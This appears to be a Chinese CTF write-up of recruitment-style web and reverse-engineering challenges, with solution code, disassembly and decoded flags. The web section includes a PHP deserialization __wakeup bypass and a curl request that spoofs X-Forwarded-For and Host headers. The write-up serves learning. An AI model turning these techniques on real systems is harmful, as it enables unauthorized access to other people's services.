Web [Baby] SignIn 查看源代码,script.js文件中有一段document.getElementById(‘flag’).addEventListener(‘click’, function()下面是一段jsfuck混淆
https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag
[Baby] Backdoor post传system()执行系统命令,找到flag
[Baby] Webpack https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章
安装nodejs 用reverse-sourcemap .map文件还原找到flag
[Easy] Leak .swp备份文件 vim -r还原得到flag
[Easy] ezhttp 传参的时候有些问题,像传host还有referer,可能是我这边安装的burp有问题,上网上查了一下发现curl也能传很多参数
1 curl -X CNSS -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" -H "Referer: cnss.io" -H "X-Forwarded-For: 127.0.0.1" -H "Host: uestc.edu.cn" -H "Content-Type: application/json" -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" -b "name=nyyyddddn;password=123456" -u nyyyddddn:123456 http://124.221.34.13:50005/Index
[Easy] ezunserialize fssmsl网页那显示错误是unicode里面的LRI PDI RLO的原因,在ide里面没有这种问题,传参的时候转url编码传就行了,只需要改对象数量绕过__wakeup就拿到flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <?php error_reporting (0 );show_source (__FILE__ );include "flag.php" ;class CNSS public $username = 'admin' ; private $i_want2_say = 'fssmsli_like_web' ; protected $password = 'ctf' ; function __wakeup ( { $this ->username = 'guest' ; $this ->i_want2_say = 'i_like_web' ; $this ->password = '123456' ; echo "<br/> wake up! <br/>" ; } function __destruct ( { echo "destruct<br />" ; if ($this ->username === 'admin' && $this ->password === 'ctf' && $this ->i_want2_say === 'fssmsli_like_web' ) { global $flag ; echo $flag ; } else echo "you are 2 baby la<br/>" ; } } $aa = new CNSS ();$ss = serialize ($aa );$ss =str_replace ('"CNSS":3' ,'"CNSS":4' ,$ss );echo urlencode ($ss );
Re [Baby] Welcome to Reverse World! main函数那,一打开就有flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near Str= byte ptr -40h push rbp mov rbp, rsp sub rsp, 60h call __main lea rax, [rbp+Str] mov rdx, rax lea rcx, Format ; "%s" call scanf lea rax, [rbp+Str] mov rcx, rax ; Str call strlen mov rdx, rax lea rax, [rbp+Str] mov r8, rdx ; Size lea rdx, flag ; "cnss{1t_s3ems_l1ke_Y0u_c4n_us3_IDA_n0w!"... mov rcx, rax ; Buf1 call memcmp test eax, eax jnz short loc_401587
[Baby] Find me 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near push rbp mov rbp, rsp sub rsp, 20h call __main lea rcx, aOopsWhereIsMyF ; "Oops! Where is my flag?" call puts lea rcx, aLearnAboutStri ; "Learn about Strings and you can see the"... call puts lea rcx, aLearnAboutFunc ; "Learn about Functions and you can see t"... call puts lea rcx, aLearnAboutXref ; "Learn about Xref and you can see the th"... call puts lea rcx, aTheLastPartIsI ; "The last part is _ID4_N0w!}" call puts add rsp, 20h pop rbp retn main endp
根据提示,搜字符串cnss{ ,alt+t匹配大小写,找到第一部分cnss{W0w!Y0u’,0
查找函数,发现第二部分是函数名_Comp1et3ly_Uns7and_
交叉引用puts找到第三部分
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ; Attributes: bp-based frame public sub736 sub736 proc near push rbp mov rbp, rsp sub rsp, 20h mov ecx, 68h ; 'h' ; Character call putchar mov ecx, 30h ; '0' ; Character call putchar mov ecx, 77h ; 'w' ; Character call putchar mov ecx, 5Fh ; '_' ; Character call putchar mov ecx, 74h ; 't' ; Character call putchar mov ecx, 30h ; '0' ; Character call putchar mov ecx, 5Fh ; '_' ; Character call putchar mov ecx, 75h ; 'u' ; Character call putchar mov ecx, 73h ; 's' ; Character call putchar mov ecx, 33h ; '3' ; Character call putchar lea rcx, Buffer ; "Find out which function refer to me!" call puts mov eax, 1BF52h add rsp, 20h pop rbp retn
拼接获得flag cnss{W0w!Y0u_Comp1et3ly_Uns7and_h0w_t0_us3_ID4_N0w!}
[Easy] 回レ! 雪月花 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 int __cdecl main (int argc, const char **argv, const char **envp) { int i; int j; int k; char v7[40 ]; unsigned __int64 v8; v8 = __readfsqword(0x28 u); puts ("Please input your flag:" ); __isoc99_scanf("%s" , v7); for ( i = 0 ; i <= 31 ; ++i ) v7[i] ^= 0x11 u; for ( j = 0 ; j <= 28 ; ++j ) encode(&v7[j], &v7[j + 1 ], &v7[j + 2 ], &v7[j + 3 ]); for ( k = 0 ; k <= 31 && v7[k] == cipher[k]; ++k ) ; if ( k == 32 ) puts ("Correct!" ); else puts ("Wrong!" ); return 0 ; }
这种逆向题倒过来看会很直观,分三层,把输入的字符串异或上0x11u,然后encode一遍,和cipher判断,一致获得flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 _BYTE *__fastcall encode (_BYTE *a1, _BYTE *a2, _BYTE *a3, _BYTE *a4) { _BYTE *result; char v5; char v6; char v7; char v8; v5 = (*a1 << 7 ) | (*a2 >> 1 ); v6 = ((*a4 >> 2 ) | (*a3 << 6 )) ^ v5; v7 = ((*a1 >> 1 ) | (*a2 << 7 )) ^ v6; v8 = ((*a3 >> 2 ) | (*a4 << 6 )) ^ v7; *a1 = v5; *a2 = v6; *a3 = v7; result = a4; *a4 = v8; return result; }
看了半天了不太会,去掉异或之后其他的不知道怎么做了
搜了一下发现这好像是往年题,做法是把异或去掉后,根据a1 a2 a3 a4的顺序倒着做一遍就好了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 #include <cstdio> int c[] = { 63 ,143 ,163 ,188 ,141 ,39 ,122 ,103 ,226 ,3 ,162 ,224 , 172 ,234 ,149 ,139 ,163 ,237 ,204 ,182 ,50 ,140 ,148 ,82 , 130 ,138 ,20 ,198 ,245 ,174 ,104 ,115 ,0 }; int main () { for (int i = 28 ; i >= 0 ; i--) { c[i + 3 ] ^= c[i + 2 ]; c[i + 2 ] ^= c[i + 1 ]; c[i + 1 ] ^= c[i + 0 ]; int p[4 ]; p[0 ] = ((c[i + 2 ] & 127 ) << 1 ) | (c[i] >> 7 ); p[1 ] = ((c[i] & 127 ) << 1 ) | (c[i + 2 ] >> 7 ); p[2 ] = ((c[i + 3 ] & 63 ) << 2 ) | (c[i + 1 ] >> 6 ); p[3 ] = ((c[i + 1 ] & 63 ) << 2 ) | (c[i + 3 ] >> 6 ); for (int j = 0 ; j < 4 ; j++) c[i + j] = p[j]; } for (int i = 0 ; i < 32 ; i++) putchar (c[i] ^ 17 ); puts ("" ); return 0 ; }
[Easy] 邪王真眼 encode 3和4 然后还有一个alpha的索引表,应该是base64 然后替换了索引表
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 __int64 __fastcall encode (char *a1, int a2, _BYTE *a3, int *a4) { int v5; int v6; int v7; int v8; int v9; int i; int v12; char *v13; v13 = a1; if ( !a1 || !a2 ) return 0xFFFFFFFF i64; v12 = 0 ; if ( a2 % 3 ) v12 = 3 - a2 % 3 ; v9 = a2 + v12; v8 = 8 * (a2 + v12) / 6 ; for ( i = 0 ; i < v9; i += 3 ) { *a3 = alpha[*v13 >> 2 ]; if ( a2 + v12 - 3 == i && v12 ) { if ( v12 == 1 ) { v5 = (char )cmove_bits((unsigned __int8)*v13, 6 i64, 2 i64); a3[1 ] = alpha[v5 + (char )cmove_bits((unsigned __int8)v13[1 ], 0 i64, 4 i64)]; a3[2 ] = alpha[(char )cmove_bits((unsigned __int8)v13[1 ], 4 i64, 2 i64)]; a3[3 ] = 61 ; } else if ( v12 == 2 ) { a3[1 ] = alpha[(char )cmove_bits((unsigned __int8)*v13, 6 i64, 2 i64)]; a3[2 ] = 61 ; a3[3 ] = 61 ; } } else { v6 = (char )cmove_bits((unsigned __int8)*v13, 6 i64, 2 i64); a3[1 ] = alpha[v6 + (char )cmove_bits((unsigned __int8)v13[1 ], 0 i64, 4 i64)]; v7 = (char )cmove_bits((unsigned __int8)v13[1 ], 4 i64, 2 i64); a3[2 ] = alpha[v7 + (char )cmove_bits((unsigned __int8)v13[2 ], 0 i64, 6 i64)]; a3[3 ] = alpha[v13[2 ] & 0x3F ]; } a3 += 4 ; v13 += 3 ; } if ( a4 ) *a4 = v8; return 0 i64; }
用这个网站http://web.chacuo.net/netbasex把alpha索引表加上去,解密UR3oWS5E0G03tRibWRrR0cEx拿到flag
[Mid] 恭喜你获得了flag提现机会! ida中patch program修改然后直接call outputflag就拿到flag了
[Mid] Pyfuck 1 2 3 4 5 6 7 8 9 10 x = [~((((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~(((((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~(((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),~((~((~((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~(((~((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))] flag = input("flag: ") if len(flag) == 31: for i in range(len(flag)): if (ord(flag[i])^((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))!=x[i]: print("Wrong") exit() print("Correct") else: print("Wrong")
这个挺有意思的[]<[]产生一个0然后用各种位运算。只需要x[]异或上if判断中的
(((((((-([]<[]))<<(-([]<[]))))<<(-([]<[]))))<<(-([]<[])))<<(-~([]<[]))))然后chr输出就拿到flag了
[Mid] diannaobaozhale 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 main proc near var_5 = byte ptr -5 var_4 = dword ptr -4 ; __unwind { endbr64 push rbp mov rbp, rsp sub rsp, 10h mov [rbp+var_5], 63 mov edi, 63h call _putchar mov edi, 6Eh call _putchar mov edi, 73h call _putchar mov edi, 73h call _putchar mov edi, 7Bh call _putchar mov [rbp+var_4], 0 jmp short loc_11B0 ; --------------------------------------------------------------------------- loc_1194: movsx eax, [rbp+var_5] mov edi, eax ; call _putchar movzx eax, [rbp+var_5] add eax, 2 xor eax, 1 mov [rbp+var_5], al add [rbp+var_4], 1 loc_11B0: cmp [rbp+var_4], 9 jle short loc_1194 mov edi, 7Dh call _putchar mov eax, 0 leave retn ; } main endp
__putchar输出字符
63h 6Eh 73h 73h 7Bh 对应cnss{
cmp [rbp+var_4], 9 jle short loc_1194以及add [rbp+var_4], 1
就是一个九次的循环
7Dh对应 }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #include <cstdio> int main () putchar ('c' ); putchar ('n' ); putchar ('s' ); putchar ('s' ); putchar ('{' ); char rbpvar5 = 'c' ; for (int i = 0 ; i <= 9 ; i++) { putchar (rbpvar5); rbpvar5 += 2 ; rbpvar5 ^= 1 ; } putchar ('}' ); putchar ('\n' ); return 0 ; }
拿到flag cnss{cdghklopst}
[Hard] Shino 的心跳大冒险 玩了一下发现flag被挡住了,看目录里面有好几个Yuri关键词,搜索了一下发现
https://github.com/rinkako/YuriAVGEngine这个项目
看了下简洁这个游戏引擎是基于虚拟机的,有个main.sil是存放游戏逻辑的中间码的,但是被加密了,像是base64加密,用在线的base64解密发现乱码
继续翻项目,发现有个yuriricli是用来编译项目的,下载源码看看里面是怎么加密的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 using System.Text;namespace Yuri.YuriInterpreter { public static class YuriEncryptor { public static string EncryptString (string data, string key { string str = string .Empty; if (string .IsNullOrEmpty(data)) { return str; } MemoryStream ms = new MemoryStream(); byte [] myKey = Encoding.UTF8.GetBytes(key); byte [] myIV = { 0x12 , 0x34 , 0x56 , 0x78 , 0x90 , 0xAB , 0xCD , 0xEF }; DES myProvider = new DESCryptoServiceProvider(); CryptoStream cs = new CryptoStream(ms, myProvider.CreateEncryptor(myKey, myIV), CryptoStreamMode.Write); try { byte [] bs = Encoding.UTF8.GetBytes(data); cs.Write(bs, 0 , bs.Length); cs.FlushFinalBlock(); str = Convert.ToBase64String(ms.ToArray()); } finally { cs.Close(); ms.Close(); } return str; } public static string DecryptString (string data, string key { string str = string .Empty; if (string .IsNullOrEmpty(data)) { throw new Exception("data is empty" ); } MemoryStream ms = new MemoryStream(); byte [] myKey = Encoding.UTF8.GetBytes(key); byte [] myIV = { 0x12 , 0x34 , 0x56 , 0x78 , 0x90 , 0xAB , 0xCD , 0xEF }; DES myProvider = new DESCryptoServiceProvider(); CryptoStream cs = new CryptoStream(ms, myProvider.CreateDecryptor(myKey, myIV), CryptoStreamMode.Write); try { byte [] bs = Convert.FromBase64String(data); cs.Write(bs, 0 , bs.Length); cs.FlushFinalBlock(); str = Encoding.UTF8.GetString(ms.ToArray()); } finally { cs.Close(); ms.Close(); } return str; } } }
这个是des加密的,下面还有解密函数,就在窗口load那调用了一下
1 2 3 4 5 6 7 8 9 10 11 private void CPMainForm_Load (object sender, EventArgs e{ String path = "D:\\dw_file\\cnss\\CNSS Rev Challenge\\Scenario\\main.sil" ; foreach (string encryptedData in File.ReadLines(path)) { string key = "yurayuri" ; string decryptedData = YuriEncryptor.DecryptString(encryptedData, key); Console.WriteLine(decryptedData); } }
解密出来的文本是这样的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 main_0@NOP^^^^main_0@act_bgm#main_1@act_bg#main_2@act_se#main_4@act_dialog#main_6@act_cstand#main_7@act_se#main_9@act_dialog#main_11@act_deletecstand#main_12@act_se#main_14@act_dialog#main_16@act_se#main_18@act_dialog#main_20@act_stopbgm#main_21@act_cstand#main_22@act_se#main_24@act_dialog#main_26@act_bgm#main_27@act_se#main_29@act_dialog#main_31@act_se#main_33@act_dialog#main_35@act_se#main_37@act_dialog#main_39@act_deletecstand#main_40@act_bg#main_41@act_se#main_43@act_dialog#main_45@act_se#main_47@act_dialog#main_49@act_se#main_51@act_dialog#main_53@act_se#main_55@act_dialog#main_57@act_se#main_59@act_dialog#main_61@act_se#main_63@act_dialog#main_65@act_se#main_66@act_bg#main_67@act_wait#main_68@act_bg#main_69@act_cstand#main_71@act_dialog#main_73@act_deletecstand#main_74@act_se#main_75@act_bg#main_76@act_wait#main_77@act_se#main_78@act_bg#main_79@act_wait#main_80@act_bg#main_81@act_stopbgm#main_82@act_cstand#main_83@act_se#main_85@act_dialog#main_87@act_bg#main_88@act_bgm#main_89@act_deletecstand#main_90@act_cstand#main_91@act_se#main_93@act_dialog#main_95@act_se#main_97@act_dialog#main_99@act_se#main_101@act_dialog#main_103@act_se#main_105@act_dialog#main_107@act_se#main_109@act_dialog#main_111@act_se#main_113@act_dialog#main_115@act_se#main_117@act_dialog#main_119@act_se#main_121@act_dialog#main_123@act_se#main_125@act_dialog#main_127@act_se#main_129@act_dialog#main_131@act_deletecstand#main_132@act_picture#main_133@act_se#main_135@act_dialog#main_137@act_se#main_139@act_dialog#main_142@act_dialog#main_144@act_deletepicture#main_145@act_se#main_147@act_dialog#main_150@act_dialog#main_152@act_shutdown^^0^^109097105110 main_0@act_bgm^filename@050053046109112051#vol@052057056^^main_1@act_bg^^^0^^048045048 main_1@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_2@act_se^^^0^^049045048 main_2@act_se^filename@121117107117109111095048048048049046109112051#vol@056048048^^main_4@act_dialog^^^0^^050045048 main_4@act_dialog^^^main_6@act_cstand^^^0^^083104105110111058227128142230136145229143171032083104105110111239188140230152175228184128229144141229136154229136154229133165229173166231148181229173144231165158230138128229164167229173166231154132232174161231174151230156186229176143231153189227128130227128143013010035048 main_6@act_cstand^id@048#name@083104105110111#face@049#x@049051048#y@049051048#loc@^^main_7@act_se^^^0^^054045048 main_7@act_se^filename@121117107117109111095048048048050046109112051#vol@056048048^^main_9@act_dialog^^^0^^055045048 main_9@act_dialog^^^main_11@act_deletecstand^^^0^^083104105110111058032227128142232191153230152175230136145239188140233149191231155184232141137231142135239188140228189134229175140230156137231165158231167152230132159227128130227128143013010035048 main_11@act_deletecstand^id@048^^main_12@act_se^^^0^^049049045048 main_12@act_se^filename@121117107117109111095048048048051046109112051#vol@056048048^^main_14@act_dialog^^^0^^049050045048 main_14@act_dialog^^^main_16@act_se^^^0^^083104105110111058032227128142231142176229156168230136145230173163231171153229156168230160161233151168229143163227128130228187164228186186229144145229190128231154132229164167229173166231148159230180187230136145230157165229149166239188129227128143013010035048 main_16@act_se^filename@121117107117109111095048048048052046109112051#vol@056048048^^main_18@act_dialog^^^0^^049054045048 main_18@act_dialog^^^main_20@act_stopbgm^^^0^^083104105110111058032227128142231173137231173137239188140233130163230152175228187128228185136239188159227128143013010035048 main_20@act_stopbgm^^^main_21@act_cstand^^^0^^050048045048 main_21@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_22@act_se^^^0^^050049045048 main_22@act_se^filename@121117107117109111095048048048053046109112051#vol@056048048^^main_24@act_dialog^^^0^^050050045048 main_24@act_dialog^^^main_26@act_bgm^^^0^^083104105110111058032227128142231156139232181183230157165230156137231130185229131143046046046046230136145232135170229183177239188159227128143013010035048 main_26@act_bgm^filename@050057046109112051#vol@053048050^^main_27@act_se^^^0^^050054045048 main_27@act_se^filename@121117107117109111095048048048054046109112051#vol@056048048^^main_29@act_dialog^^^0^^050055045048 main_29@act_dialog^^^main_31@act_se^^^0^^239188159239188159239188159239188154227128142229141131228184135232166129229176143229191131046046046227128143013010035048 main_31@act_se^filename@121117107117109111095048048048055046109112051#vol@056048048^^main_33@act_dialog^^^0^^051049045048 main_33@act_dialog^^^main_35@act_se^^^0^^239188159239188159239188159239188154227128142232191155229133165230160161229155173229144142239188140229143175232131189228188154230156137228184128228184170229165135230128170231154132229165179228186186230137190228184138228189160227128130227128143013010035048 main_35@act_se^filename@121117107117109111095048048048056046109112051#vol@056048048^^main_37@act_dialog^^^0^^051053045048 main_37@act_dialog^^^main_39@act_deletecstand^^^0^^239188159239188159239188159239188154227128142229165185230136180231157128231187191232137178229184189229173144239188140228184128229164180231153189229143145227128130232153189231132182231156139232181183230157165229190136229143175231136177239188140228189134229133182229174158232131140229144142230156137228184128228184170229188186229164167231154132231165158231167152231187132231187135227128130227128143013010035048 main_39@act_deletecstand^id@048^^main_40@act_bg^^^0^^051057045048 main_40@act_bg^id@049#filename@067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_41@act_se^^^0^^052048045048 main_41@act_se^filename@121117107117109111095048048048057046109112051#vol@056048048^^main_43@act_dialog^^^0^^052049045048 main_43@act_dialog^^^main_45@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180230142165232167166228186134232191153228184170231165158231167152231187132231187135231154132228186186239188140233131189230151160228184128228190139229164150229156176232142183229190151228186134229188186229164167231154132229138155233135143227128130227128143013010035048 main_45@act_se^filename@121117107117109111095048048049048046109112051#vol@056048048^^main_47@act_dialog^^^0^^052053045048 main_47@act_dialog^^^main_49@act_se^^^0^^239188159239188159239188159239188154227128142230184151233128143230181139232175149227128129232189175228187182231160180232167163227128129229188128229143145232191144231187180046046046230149176228184141230184133231154132233171152231171175231165158231167152230138128230156175229156168232191153228184170231187132231187135233135140228187163228187163231155184228188160227128130227128143013010035048 main_49@act_se^filename@121117107117109111095048048049049046109112051#vol@056048048^^main_51@act_dialog^^^0^^052057045048 main_51@act_dialog^^^main_53@act_se^^^0^^239188159239188159239188159239188154227128142229144132231167141229165150233161185229165150233135145227128129228191157231160148229138160229136134227128129229164167229142130111102102101114239188140229133168233131189232162171232191153228184170231187132231187135231154132228186186230143161229156168230137139228184173227128130227128143013010035048 main_53@act_se^filename@121117107117109111095048048049050046109112051#vol@056048048^^main_55@act_dialog^^^0^^053051045048 main_55@act_dialog^^^main_57@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180228187150228187172232191152228188154231187143229184184228184190229138158228184128231167141231165158231167152228187170229188143239188140228184128231190164228186186229155180229156168229165182232140182229186151230151129232190185231148168228184141231159165233129147229147170233135140230157165231154132229164167233135143231187143232180185229164167229150157231137185229150157227128130227128143013010035048 main_57@act_se^filename@121117107117109111095048048049051046109112051#vol@056048048^^main_59@act_dialog^^^0^^053055045048 main_59@act_dialog^^^main_61@act_se^^^0^^239188159239188159239188159239188154227128142233130163228184170229165179228186186232191152228188154230139191230137128232176147032102108097103032230157165232175177230131145228189160227128130230136145229183178231187143229129183229129183230139191229136176228186134233130163228184170228184156232165191227128130227128143013010035048 main_61@act_se^filename@121117107117109111095048048049052046109112051#vol@056048048^^main_63@act_dialog^^^0^^054049045048 main_63@act_dialog^^^main_65@act_se^^^0^^239188159239188159239188159239188154227128142230136145232191153229176177230138138229174131229145138232175137228189160239188140229141131228184135228184141232166129231157128228186134229165185231154132233129147239188129227128143013010035048 main_65@act_se^filename@121117107117109111095048048049053046109112051#vol@056048048^^main_66@act_bg^^^0^^054053045048 main_66@act_bg^id@049#filename@099111110118101114049046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_67@act_wait^^^0^^054054045048 main_67@act_wait^time@051048048048^^main_68@act_bg^^^0^^054055045048 main_68@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_69@act_cstand^^^0^^054056045048 main_69@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_71@act_dialog^^^0^^054057045048 main_71@act_dialog^^^main_73@act_deletecstand^^^0^^239188129239188129013010035048 main_73@act_deletecstand^id@048^^main_74@act_se^^^0^^055051045048 main_74@act_se^filename@121117107117109111095048048049054046109112051#vol@056048048^^main_75@act_bg^^^0^^055052045048 main_75@act_bg^id@049#filename@099111110118101114050046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_76@act_wait^^^0^^055053045048 main_76@act_wait^time@051048048048^^main_77@act_se^^^0^^055054045048 main_77@act_se^filename@121117107117109111095048048049055046109112051#vol@056048048^^main_78@act_bg^^^0^^055055045048 main_78@act_bg^id@049#filename@079110108121067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_79@act_wait^^^0^^055056045048 main_79@act_wait^time@049053048048048^^main_80@act_bg^^^0^^055057045048 main_80@act_bg^id@049#filename@098108097110107046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_81@act_stopbgm^^^0^^056048045048 main_81@act_stopbgm^^^main_82@act_cstand^^^0^^056049045048 main_82@act_cstand^id@048#name@083104105110111#face@051#x@049051048#y@049051048#loc@^^main_83@act_se^^^0^^056050045048 main_83@act_se^filename@121117107117109111095048048049056046109112051#vol@056048048^^main_85@act_dialog^^^0^^056051045048 main_85@act_dialog^^^main_87@act_bg^^^0^^083104105110111058227128142231165158226128148226128148231167152226128148226128148228186186226128148226128148227128143013010035048 main_87@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_88@act_bgm^^^0^^056055045048 main_88@act_bgm^filename@050053046109112051#vol@052057056^^main_89@act_deletecstand^^^0^^056056045048 main_89@act_deletecstand^id@048^^main_90@act_cstand^^^0^^056057045048 